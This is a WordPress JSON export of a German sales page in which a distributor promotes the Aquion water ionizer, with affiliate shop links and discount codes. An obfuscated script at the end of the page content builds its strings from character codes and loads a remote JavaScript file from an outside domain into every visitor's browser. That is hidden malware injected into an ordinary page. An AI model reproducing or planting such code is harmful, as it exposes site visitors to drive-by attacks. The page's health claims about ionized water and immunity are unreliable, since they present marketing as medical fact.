{"id":6542,"date":"2017-10-27T07:01:53","date_gmt":"2017-10-27T07:01:53","guid":{"rendered":"http:\/\/blog.energiemedizin.de\/?page_id=6542"},"modified":"2017-10-27T07:15:36","modified_gmt":"2017-10-27T07:15:36","slug":"aquion-aktivwasser","status":"publish","type":"page","link":"http:\/\/blog.energiemedizin.de\/?page_id=6542","title":{"rendered":"Aquion AktivWasser"},"content":{"rendered":"<div class=\"postentry\">\n<p>&nbsp;<\/p>\n<p><span style=\"color: #000000;\"><b>Ihr Aquion AktivWasser-Berater<\/b><\/span><\/p>\n<p><b> <\/b><span style=\"color: #000000;\"><b><img decoding=\"async\" loading=\"lazy\" class=\"wp-image-6025 alignright\" src=\"http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2011\/03\/cropped-Passfoto-aktuell-klein-1.jpg\" sizes=\"(max-width: 186px) 100vw, 186px\" srcset=\"http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2011\/03\/cropped-Passfoto-aktuell-klein-1.jpg 512w, http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2011\/03\/cropped-Passfoto-aktuell-klein-1-150x150.jpg 150w, http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2011\/03\/cropped-Passfoto-aktuell-klein-1-300x300.jpg 300w, http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2011\/03\/cropped-Passfoto-aktuell-klein-1-270x270.jpg 270w, http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2011\/03\/cropped-Passfoto-aktuell-klein-1-192x192.jpg 192w, http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2011\/03\/cropped-Passfoto-aktuell-klein-1-180x180.jpg 180w, http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2011\/03\/cropped-Passfoto-aktuell-klein-1-32x32.jpg 32w\" alt=\"\" width=\"186\" height=\"186\" \/><\/b>Ich, Achim Steffan, habe am 30.09.1993 die Firma Energiemedizin &amp; Gesundheit gegr\u00fcndet und bin seitdem im Vertrieb von Gesundheits- und Wellnessprodukten t\u00e4tig.<\/span><\/p>\n<p><span style=\"color: #000000;\">Wir zeigen den Menschen und ihren Familien, wie sie mehr Gesundheit und Lebensfreude durch Vorsorge erreichen. Wissenswertes zur Vermeidung von Zivilisationskrankheiten und allgemeine Gesundheitstipps erfahren Sie von uns. Unsere Webseiten helfen Ihnen bei Ihren Recherchen zu Ihrer individuellen Prophylaxe weiter.<\/span><\/p>\n<p><span style=\"color: #000000;\">Ein wichtiger Aspekt war f\u00fcr mich immer gesundes Wasser. Eine Firma, die ich 1994 kennenlernte, war \u2013 wie sich sp\u00e4ter herausstellte \u2013 nicht das Nonplusultra. Es dauerte 20 Jahre bis ich in einem Webinar auf die Firma Salux aufmerksam gemacht wurde. Nach drei Monaten Recherche war f\u00fcr mich klar, dass ich das Richtige gefunden habe.<\/span><\/p>\n<p><span style=\"color: #000000;\">\u201eDas was wir also trinken, entscheidet \u00fcber unsere Vitalit\u00e4t, unsere Leistungsf\u00e4higkeit und Langlebigkeit. Letztlich auf Schwingungsebene auch dar\u00fcber, womit wir in Resonanz sind! Solange der Wasser- und Elektrolythaushalt gest\u00f6rt sind, wird keine Therapie nachhaltig helfen k\u00f6nnen!\u201c Das waren die entscheidenden Aussagen von Kurt H\u00f6rmann in diesem Webinar, die mich zum Aquion AktivWasser-Berater werden lie\u00dfen. Seitdem geh\u00f6rt der \u201eAquion-WasserIonisierer\u201c zu unserer Produktpalette und meinem Haushalt. \u00a0<\/span><\/p>\n<p><span style=\"color: #000000;\">Schauen Sie sich hier um, damit Sie alle Infos zu diesem genialen Produkt finden. \u00dcber laufende Webinare zu unseren Angeboten werden Sie von uns st\u00e4ndig informiert. Mit unseren Angeboten helfen Sie Ihrem K\u00f6per, sich selbst zu sch\u00fctzen und das Immunsystem zu st\u00e4rken.<\/span><br \/>\n<span style=\"color: #000000;\"> Zahlreiche \u00c4rzte, Heilpraktiker und Gesundheitszentren sowie Sportstudios und Wellness-Hotels empfehlen unsere Produkte gerne weiter. Testen Sie unsere Angebote und lassen Sie sich, wie viele andere Menschen, begeistern. Dazu kommen wir gerne per Internet oder pers\u00f6nlich zu Ihnen ins Haus und pr\u00e4sentieren unsere Produkte. Im Internet k\u00f6nnen alle Produkte auch direkt bestellt werden. Info-Material senden wir Ihnen auf Wunsch auch per Post zu.<\/span><\/p>\n<p><span style=\"color: #000000;\">Schaffen Sie sich ein gesundes Zuhause. Nehmen Sie Kontakt mit uns auf und informieren Sie sich solange Sie noch gesund sind. Ihr K\u00f6rper wird es Ihnen danken. Wissen hat noch niemandem geschadet und in den Medien erfahren Sie nicht immer, was Ihnen wirklich hilft.<\/span><br \/>\n<span style=\"color: #000000;\"> Wir freuen uns auf ein pers\u00f6nliches Gespr\u00e4ch mit Ihnen.<\/span><br \/>\n<span style=\"color: #000000;\"> Bleiben Sie gesund und gehen Sie liebevoll mit sich um.<\/span><\/p>\n<p><span style=\"color: #000000;\">Achim Steffan &amp; Team\u00a0<\/span><br \/>\n<span style=\"color: #000000;\"> Social Marketer,<\/span><br \/>\n<span style=\"color: #000000;\"> Dipl. Networker (SNA)<\/span><br \/>\n<span style=\"color: #000000;\"> Selbstst\u00e4ndiger Aquion AktivWasser Berater<\/span><\/p>\n<div class=\"imageline2\">\n<p><span style=\"color: #000000;\">Besuchen Sie den <a href=\"http:\/\/www.aquion.de\/aquion-shop\/?sPartner=25412\" target=\"_blank\" rel=\"noopener\">Aquion Onlineshop<\/a> und nutzen Sie den Vorteils-Code, um Ihr eBook kostenlos herunterzuladen.<\/span><br \/>\n<span style=\"color: #000000;\"> Der zweite Code sichert Ihnen ein Bonus-Angebot bei der Bestellung eines Aquionisierers. Die Codes werden w\u00e4hrend des Bestellvorgangs automatisch abgefragt und eingel\u00f6st.<\/span><\/p>\n<div class=\"code\"><span style=\"color: #000000;\">Vorteils-Code f\u00fcr Gratis-eBook: 90025412<\/span><br \/>\n<span style=\"color: #000000;\"> Vorteils-Code f\u00fcr Bonus-Angebot: 25412<\/span><\/div>\n<\/div>\n<div><\/div>\n<div><a href=\"http:\/\/www.aquion.de\/aquion-shop\/?sPartner=25412\"> <img decoding=\"async\" loading=\"lazy\" class=\"alignright wp-image-6537\" src=\"http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2017\/10\/Direkt-zum-Shop.png\" sizes=\"(max-width: 444px) 100vw, 444px\" srcset=\"http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2017\/10\/Direkt-zum-Shop.png 451w, http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2017\/10\/Direkt-zum-Shop-300x224.png 300w\" alt=\"\" width=\"444\" height=\"332\" \/><\/a> <a href=\"http:\/\/www.aquion.de\/aquion-shop\/ebook\/30\/ebook-warum-die-kuh-kein-cola-trinkt?c=123?sPartner=25412\"><img decoding=\"async\" loading=\"lazy\" class=\"alignleft wp-image-6538\" src=\"http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2017\/10\/E-Book.png\" sizes=\"(max-width: 443px) 100vw, 443px\" srcset=\"http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2017\/10\/E-Book.png 500w, http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2017\/10\/E-Book-300x226.png 300w\" alt=\"\" width=\"443\" height=\"333\" \/><\/a><\/div>\n<\/div>\n<div class=\"postmetadata\"><\/div>\n<div><\/div>\n<div><\/div>\n<div><\/div>\n<div><\/div>\n<div><\/div>\n<div><\/div>\n<div><\/div>\n<div><\/div>\n<div><\/div>\n<div><\/div>\n<div><\/div>\n<div><\/div>\n<div><\/div>\n<div><span style=\"color: #000000;\"><strong>Quelle:<\/strong> <\/span><\/div>\n<div><a href=\"http:\/\/steffan.aquion.de\/beratung.php\"><img decoding=\"async\" loading=\"lazy\" class=\"alignleft wp-image-6536\" src=\"http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2017\/10\/Logo-neu.png\" alt=\"\" width=\"350\" height=\"136\" srcset=\"http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2017\/10\/Logo-neu.png 559w, http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2017\/10\/Logo-neu-300x116.png 300w\" sizes=\"(max-width: 350px) 100vw, 350px\" \/><\/a><\/div>\n<p><script type=text\/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,56);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp; Ihr Aquion AktivWasser-Berater Ich, Achim Steffan, habe am 30.09.1993 die Firma Energiemedizin &amp; Gesundheit gegr\u00fcndet und bin seitdem im Vertrieb von Gesundheits- und Wellnessprodukten t\u00e4tig. Wir zeigen den Menschen und ihren Familien, wie sie mehr Gesundheit und Lebensfreude durch Vorsorge erreichen. Wissenswertes zur Vermeidung von Zivilisationskrankheiten und allgemeine Gesundheitstipps erfahren Sie von uns. Unsere [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/pages\/6542"}],"collection":[{"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6542"}],"version-history":[{"count":4,"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/pages\/6542\/revisions"}],"predecessor-version":[{"id":6546,"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/pages\/6542\/revisions\/6546"}],"wp:attachment":[{"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6542"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}